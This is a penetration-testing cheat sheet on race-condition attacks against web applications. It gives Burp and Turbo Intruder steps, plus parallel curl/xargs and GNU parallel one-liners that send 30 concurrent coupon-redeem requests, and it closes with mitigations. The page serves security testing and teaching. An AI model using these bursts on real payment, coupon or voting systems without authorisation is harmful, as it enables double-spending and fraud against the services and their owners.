web-pentest

Race Conditions

Race-condition exploitation — limit-overrun targets, Burp single-packet attack, Turbo Intruder gating, parallel curl/GNU-parallel bursts, plus how to confirm and mitigate (idempotency, locks).

1 views Jun 2026 lazyhackers

Targets (Limit Overrun) (3)

redeem a coupon / gift card twice

Use a one-time resource multiple times via concurrency

limit toctou

withdraw or transfer a balance twice simultaneously

Double-spend before the balance updates

limit money

register / vote / apply-promo twice

Beat uniqueness checks with parallel requests

limit uniqueness

Burp — Single-Packet Attack (2)

Repeater -> add tabs to a group -> "Send group in parallel"

Fire all requests together (single-packet attack, HTTP/2)

burp singlepacket

"Send group (single connection)"

Last-byte sync to minimise network jitter

burp sync

Turbo Intruder (3)

for i in range(20): engine.queue(target.req, gate='race')

Queue N requests behind a gate

turbointruder gate

engine.openGate('race')

Release all gated requests at the same instant

turbointruder gate

template: race-single-packet.py

Use the bundled single-packet race template

turbointruder template

curl / parallel (2)

seq 30 | xargs -P30 -I{} curl -s -X POST https://target.com/api/redeem -d 'code=PROMO' -b 'session=...'

Fire 30 parallel requests with xargs

curl parallel

parallel -j30 curl -s -X POST https://target.com/api/redeem ::: $(seq 30)

GNU parallel burst

parallel

Confirm & Mitigate (2)

look for: 2x side effects, inconsistent balances, duplicate records

How to confirm a successful race

detection

fix: idempotency keys, DB unique constraints, SELECT ... FOR UPDATE locks

Defensive notes

mitigation

Race Conditions

Related Articles

JSON and YAML Unsafe Deserialization

Supply Chain Attacks

Cross-Site Scripting Mastery

File Upload to RCE

Advanced SSRF

Related Courses

Web Application Penetration Testing

Bug Bounty Hunting — From Recon to Bounty